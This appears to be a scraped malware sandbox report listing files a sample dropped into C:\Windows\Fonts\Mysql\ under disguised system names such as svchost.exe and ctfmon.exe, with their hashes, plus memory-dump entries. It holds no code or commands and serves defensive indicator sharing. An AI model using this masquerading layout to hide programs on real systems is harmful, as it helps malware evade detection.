91784a7cbfb789331ef245920127f33beae0fd6f

SHA256
41ba9c1aadfac01f40002e84238eb3941fde96e1077c4b77921cb7e3f5f29e33

SHA512
911fa63fc0800a8072ea2b963b9cecda676b2d75230fed5c87cfd931e960d72c9747a09d23d01261dbd100c0d02030122029d2e46d42c214fc03a870f9a68ace

Download Submit
C:\Windows\Fonts\Mysql\ctfmon.exe

Filesize
1.7MB

MD5
2a467ed98480308360035628e43e5f2f

SHA1
edd9cdbd69e14720e35abdbba3b87a2c9451945c

SHA256
72dd2567034e04952b8917ced3e4c28f0118d28b0252aea2d8896c3603aae505

SHA512
4c6faa3372e066869ffb9eb4f95f706f5fe5b53859f6b422c7a61a6e39ddfbe047393d2ad260088eb10bce47b8cf6c78cf11918bf4c20d8874c2cf4723723893

Download Submit
C:\Windows\Fonts\Mysql\same.bat

Filesize
11KB

MD5
07986ecd5f759e85db37302bd0493ea4

SHA1
aec5bfe87cf052ca8dd4c909e5a35ff670c08edb

SHA256
6b891a659b3a17c238918533f704c9d47f6e2f958f94a23cace19c6922cb4829

SHA512
ca8df30baf3a11823d0f415433c0dbf10694ffdad935189136327bd02ba150786db410dbaf4e223e0d1988b13323625675664b9642163cfddff26d669fd09a22

Download Submit
C:\Windows\Fonts\Mysql\svchost.exe

Filesize
256KB

MD5
7afcf45907f225e3e3cfeece3bbcd410

SHA1
9747e4c11bcf0393e1d1a2ac4b7c43af590da0bc

SHA256
c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e

SHA512
ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f

Download Submit
C:\Windows\Fonts\Mysql\taskhost.exe

Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\Fonts\Mysql\temp.txt

Filesize
12B

MD5
8cf4dec152a9d79a3d62202b886eda9b

SHA1
0c1b3d3d02c0b655aa3526a58486b84872f18cc2

SHA256
c30e56c9c8fe30ffa4a4ff712cf2fa1808ee82ca258cd4c8ebefcc82250b6c01

SHA512
a5a65f0604f8553d0be07bd5214db52d3f167e7511d29cb64e3fa9d8c510cc79976ff2a5acb9b8c09b666f306ac8e4ad389f9a2de3ca46d57b1e91060a4c50fd

Download Submit
C:\Windows\Fonts\Mysql\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
memory/1340-76-0x0000000000400000-0x0000000000E2E000-memory.dmp

Filesize
10.2MB

Download
memory/2116-67-0x0000000000400000-0x0000000000BA9000-memory.dmp

Filesize
7.7MB

Download
memory/2116-20-0x0000000000400000-0x0000000000BA9000-memory.dmp

Filesize
7.7MB

Download
memory/2116-19-0x0000000000400000-0x0000000000BA9000-memory.dmp

Filesize
7.7MB

Download
memory/2404-79-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/3628-97-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/3628-100-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/5032-104-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads